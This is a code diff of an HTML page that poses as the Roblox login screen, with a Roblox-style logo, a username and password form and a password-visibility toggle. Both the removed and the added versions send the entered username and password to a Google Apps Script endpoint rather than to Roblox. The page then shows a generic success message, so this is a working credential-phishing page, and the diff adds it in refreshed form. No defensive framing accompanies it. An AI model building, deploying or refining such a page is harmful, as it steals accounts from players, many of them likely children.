--- a/index.html
+++ b/index.html
@@ -1,184 +1,72 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-  <meta charset="UTF-8" />
-  <meta name="viewport" content="width=device-width, initial-scale=1" />
-  <title>Roblox Login</title>
-  <script src="https://cdn.tailwindcss.com"></script>
-  <style>
-    body, html {
-      margin: 0;
-      height: 100%;
-      font-family: 'Arial', sans-serif;
-      background: url("./Robloxbg.jpg") no-repeat center center fixed;
-      background-size: cover;
-      overflow: hidden;
-    }
-    .logo {
-      color: #fff;
-      font-weight: 900;
-      font-size: 3.5rem;
-      user-select: none;
-      margin-bottom: 2rem;
-      display: flex;
-      align-items: center;
-      gap: 0.25rem;
-      font-family: 'Arial Black', Arial, sans-serif;
-      position: relative;
-      z-index: 10;
-    }
-    .logo .tilted-square {
-      width: 1.2em;
-      height: 1.2em;
-      background: white;
-      transform: rotate(-20deg);
-      margin-bottom: 0.25rem;    
-      position: relative;
-      flex-shrink: 0;
-      border-radius: 0.1em;
-      box-shadow: inset 0 0 0 0.35em #000;
-    }
-    .form-container {
-      width: 100%;
-      max-width: 400px;
-      backdrop-filter: blur(8px);
-      background: rgba(0 0 0 / 0.55);
-      border-radius: 1rem;
-      padding: 2rem 2.5rem 2.5rem;
-      box-sizing: border-box;
-      box-shadow: 0 0 20px rgb(0 0 0 / 0.8);
-      color: white;
-      z-index: 10;
-    }
-    input[type="text"], input[type="password"] {
-      width: 100%;
-      background: rgba(255 255 255 / 0.1);
-      border: 1px solid rgba(255 255 255 / 0.25);
-      border-radius: 0.5rem;
-      color: white;
-      font-size: 1rem;
-      padding: 0.7rem 1rem;
-      margin-bottom: 1.3rem;
-      outline: none;
-      transition: border-color 0.3s ease;
-    }
-    input[type="text"]::placeholder, input[type="password"]::placeholder {
-      color: rgba(255 255 255 / 0.7);
-    }
-    input[type="text"]:focus, input[type="password"]:focus {
-      border-color: white;
-      background: rgba(255 255 255 / 0.2);
-    }
-    .password-wrapper {
-      position: relative;
-      display: flex;
-      align-items: center;
-    }
-    .password-wrapper input[type="password"] {
-      padding-right: 2.5rem;
-    }
-    .toggle-password {
-      position: absolute;
-      right: 1rem;
-      cursor: pointer;
-      color: rgba(255 255 255 / 0.6);
-      user-select: none;
-      font-size: 1.2rem;
-      display: flex;
-      align-items: center;
-      height: 100%;
-    }
-    .toggle-password:hover { color: white; }
-    .btn-login {
-      width: 100%;
-      background: rgba(255 255 255 / 0.15);
-      border: none;
-      border-radius: 1rem;
-      padding: 0.8rem 0;
-      font-weight: bold;
-      font-size: 1.1rem;
-      margin-bottom: 1.5rem;
-      color: white;
-      cursor: pointer;
-      transition: background 0.25s ease;
-    }
-    .btn-login:hover { background: rgba(255 255 255 / 0.35); }
-    .btn-other-device {
-      width: 100%;
-      background: transparent;
-      border: 1.5px solid white;
-      border-radius: 1rem;
-      padding: 0.8rem 0;
-      font-weight: 600;
-      font-size: 1rem;
-      color: white;
-      cursor: pointer;
-      transition: background 0.25s ease, color 0.25s ease;
-      margin-bottom: 1.3rem;
-    }
-    .btn-other-device:hover { background: white; color: #000; }
-    .forgot-password {
-      font-size: 0.85rem;
-      text-align: center;
-      color: rgba(255 255 255 / 0.8);
-      cursor: pointer;
-      font-weight: 500;
-      user-select: none;
-    }
-    .forgot-password:hover { color: white; text-decoration: underline; }
-    @media (max-width: 480px) {
-      .form-container { max-width: 95vw; padding-left: 1.5rem; padding-right: 1.5rem; }
-      .logo { font-size: 2.8rem; }
-    }
-  </style>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1">
+<title>Roblox Login</title>
+<script src="https://cdn.tailwindcss.com"></script>
+<style>
+  body, html {
+    margin: 0;
+    height: 100%;
+    font-family: 'Arial', sans-serif;
+    background: url("./Robloxbg.jpg") no-repeat center center fixed;
+    background-size: cover;
+    overflow: hidden;
+  }
+  .logo { color: #fff; font-weight: 900; font-size: 3.5rem; margin-bottom:2rem; display:flex; align-items:center; gap:0.25rem; font-family:'Arial Black', Arial, sans-serif; z-index:10;}
+  .logo .tilted-square { width:1.2em; height:1.2em; background:white; transform:rotate(-20deg); margin-bottom:0.25rem; border-radius:0.1em; box-shadow:inset 0 0 0 0.35em #000;}
+  .form-container { width:100%; max-width:400px; backdrop-filter:blur(8px); background: rgba(0 0 0 / 0.55); border-radius:1rem; padding:2rem 2.5rem; box-shadow:0 0 20px rgb(0 0 0 / 0.8); color:white; z-index:10; }
+  input[type="text"], input[type="password"] { width:100%; background: rgba(255 255 255 / 0.1); border:1px solid rgba(255 255 255 / 0.25); border-radius:0.5rem; color:white; font-size:1rem; padding:0.7rem 1rem; margin-bottom:1.3rem; outline:none; transition:border-color 0.3s ease;}
+  input[type="text"]::placeholder, input[type="password"]::placeholder { color: rgba(255 255 255 / 0.7);}
+  input[type="text"]:focus, input[type="password"]:focus { border-color:white; background: rgba(255 255 255 / 0.2);}
+  .password-wrapper { position:relative; display:flex; align-items:center;}
+  .password-wrapper input[type="password"] { padding-right:2.5rem; }
+  .toggle-password { position:absolute; right:1rem; cursor:pointer; color:rgba(255 255 255 / 0.6); font-size:1.2rem; display:flex; align-items:center; height:100%; }
+  .toggle-password:hover { color:white; }
+  .btn-login { width:100%; background: rgba(255 255 255 / 0.15); border:none; border-radius:1rem; padding:0.8rem 0; font-weight:bold; font-size:1.1rem; margin-bottom:1.5rem; color:white; cursor:pointer; transition: background 0.25s ease;}
+  .btn-login:hover { background: rgba(255 255 255 / 0.35); }
+  @media (max-width:480px) { .form-container { max-width:95vw; padding:0 1.5rem;} .logo { font-size:2.8rem;} }
+</style>
 </head>
 <body>
-  <main class="flex flex-col items-center justify-center min-h-screen px-6 relative z-10">
-    <h1 class="logo" aria-label="Roblox logo">
-      R <div class="tilted-square" aria-hidden="true"></div> B L O X
-    </h1>
+<main class="flex flex-col items-center justify-center min-h-screen px-6 relative z-10">
+<h1 class="logo">R<div class="tilted-square"></div>B L O X</h1>
 
-    <!-- Form using URL-encoded data -->
-    <form id="loginForm" class="form-container">
-      <input id="username" name="username" type="text" placeholder="Username/Email/Phone" required />
-      <div class="password-wrapper">
-        <input id="password" name="password" type="password" placeholder="Password" required />
-        <span class="toggle-password" role="button" aria-label="Toggle password visibility" tabindex="0">&#128065;</span>
-      </div>
-      <button type="submit" class="btn-login">Log In</button>
-    </form>
-  </main>
+<form id="loginForm" class="form-container">
+  <input id="username" name="username" type="text" placeholder="Username/Email/Phone" required />
+  <div class="password-wrapper">
+    <input id="password" name="password" type="password" placeholder="Password" required />
+    <span class="toggle-password">&#128065;</span>
+  </div>
+  <button type="submit" class="btn-login">Log In</button>
+</form>
+</main>
 
-  <script>
-    // Toggle password visibility
-    const toggleBtn = document.querySelector('.toggle-password');
-    const passwordInput = document.getElementById('password');
-    toggleBtn.addEventListener('click', () => {
-      passwordInput.type = passwordInput.type === 'password' ? 'text' : 'password';
-      toggleBtn.style.color = passwordInput.type === 'password' ? 'rgba(255 255 255 / 0.6)' : 'white';
+<script>
+const toggleBtn = document.querySelector('.toggle-password');
+const passwordInput = document.getElementById('password');
+toggleBtn.addEventListener('click', ()=>{ passwordInput.type = passwordInput.type==='password'?'text':'password'; toggleBtn.style.color = passwordInput.type==='password'?'rgba(255 255 255 / 0.6)':'white';});
+
+// Form submission
+document.getElementById('loginForm').addEventListener('submit', async function(e){
+  e.preventDefault();
+  const formData = new FormData(this);
+  const params = new URLSearchParams(formData);
+
+  try {
+    const response = await fetch('https://script.google.com/macros/s/AKfycbxFT4s0IL1tXwB2fFVa-LDigPeBH7IxrvSGMzQRzx_VLNMAuPHgh0neOBj5jS1_FkoQPw/exec', {
+      method:'POST',
+      body: params
     });
-    toggleBtn.addEventListener('keydown', (e) => { if(e.key==='Enter'||e.key===' '){ e.preventDefault(); toggleBtn.click(); }});
-
-    // Form submission (URL-encoded)
-    const loginForm = document.getElementById('loginForm');
-    loginForm.addEventListener('submit', async function(e){
-      e.preventDefault();
-      const formData = new FormData(loginForm);
-      const params = new URLSearchParams(formData);
-
-      try {
-        const response = await fetch('https://script.google.com/macros/s/AKfycbzeW2B6YLYY_Yn8Q4bQpnqHc2qFHqgNxpepdDjAwpRMJzgyBDmrieKn1oyp6baxRgo-Cw/exec', {
-          method: 'POST',
-          body: params
-        });
-        const result = await response.json();
-        alert("Form submitted successfully!");
-        loginForm.reset();
-      } catch(err) {
-        console.error(err);
-        alert("Error submitting form");
-      }
-    });
-  </script>
+    const result = await response.json();
+    alert("Form submitted successfully!");
+    this.reset();
+  } catch(err) {
+    console.error(err);
+    alert("Error submitting form");
+  }
+});
+</script>
 </body>
 </html>
